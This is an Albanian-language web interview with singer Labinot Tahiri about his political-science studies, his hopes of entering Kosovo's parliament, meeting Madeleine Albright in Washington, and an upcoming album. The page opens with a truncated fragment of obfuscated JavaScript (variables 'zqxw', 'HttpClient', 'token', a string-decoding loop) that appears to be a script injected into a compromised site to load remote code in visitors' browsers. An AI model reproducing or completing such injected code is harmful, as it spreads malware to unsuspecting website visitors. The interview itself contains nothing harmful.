;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

LABINOT TAHIRI LIDERI I ARDHSHMËM!

By

Derisa dikurë mbrëmjet e projektet muzikore ishin primare për Labinot Tahirin ,

sot vendin e tyre po e zënë studimet.

Labi tash e dy vite vijon ligjëratat në një fakultet privat për “Shkendat Politike”.

Përzgjedhja e kësaj lamie nuk ishte krejt rastësore. Labi shumë shpejt do t’i sfidojë

politikanët Kosovarë.

Cila është arsyeja që keni fillu studimet “Shkencat Politike”në këtë periudhë?

– Mendoj që cdo njeri ka obligim të punojë për vendin e tij edhe unë po të

mos mendoja që duhet t’i qasem dikurë politikës së mirfillt e të punoj për

të mirën e vendit, sigurisht pa studime mendojë që nuk di aq shumë për

politikën, por kjo më ka motivuar shumë pasi më intereson e ardhmja e

vendit tonë.

Çka pretendon të arrish në politikë, cili është posti që synon?

– Nëse rasisht në të ardhmen futet këmba ime në Parlamentin e Kosovës do

të kontriboj për atë qështje që unë e kom qëllimin, nuk ka rëndësi se cka do

të bëhem kryetarë, kryeminister apo minister por do të ngrijë zërin për

gjërat e kqia që ndodhin në vend si nga vendorët ashtu edhe nga

ndërkombëtarët.

Çka do të ndryshoje sikur të ipet mundësia dhe ku do të investoje?

– Çdo artist këngëtar apo aktor qkado që është para se të vdes do t’i dekoroja

me mirnjohje të shtrenjëta ndoshta edhe për së gjalli do tu ndërtoja buste,

pse mos ta bëjë këtë kur ata jan gjallë dhe kanë kontribuar për vendin,

pastaj sportin, pse Labinoti po bëhet kampion dhe është shqiptar e pasi të

bëhet kampion të marim lavdata pse është i kosovës apo i shqipris, unë

mendojë që talentin prej fillimit duhet ta ngritësh pastaj ku të dëshiron Zoti

ta qoj.

Çfarë ishte vizita juaj në Washington?

– Ishte një ofertë për dy javë të jemë me disa student në Ëazhington në një

seminarë por nganjëherë niset njeriu dhe ka fatin edhe më ndryshe nuk e e

kisha ëndërr te takohem me Joseph DioGuardin dhe Medlin Olbrajt por

krejt cka ndodhi ishte spontane, Medlin Olbrajt ia putha dorën dhe i thash

një nënë si e imja që ishte e dëbuar nga hekurudha nga Ferizaji deri në

Bllacë sikur shumë shqiptar që dolën ju jeni shkaktare që e kthyet nënën

time sërish në Kosovë dhe shumë nëna shqiptare pasi ka kontribuar në

urdhërin për të bombarduar në atë kohë caqet serbe.

A është e vërtetë se Labi do ta lë muzikën?

– jo jo nuk e lë muzikën, thjeshtë muzikën e lë kur të thotë Perëndia, unë

nëse kyqem në politikë dhe nëse vazhdoj rrugën time, qëllimet e mia, dhe

ndoshta prej të gjithë atyre në parlament vetëm unë di të këndoj ( pak

shaka ) po dua të them muzikën nuk e lë në atë aspekt përfundimtarë.

Atëherë me çka po meret Labi, a ke ndonjë projekt në furrë?

– Tash e dy vite jamë duke punuar në albumin tim të radhes i cili do të ketë

gjithsej tetë (8) këngë pesë (5) prej të cilave vetëm se i kamë përfundu,

derisa edhe tri të tjera janë në proces të përgatitjes. Albumi do të dal para

verës. Gjithashtu do ta realizoj edhe një duet bashkëpunim me Yllka Kuqin.

Artikuj të ngjashëm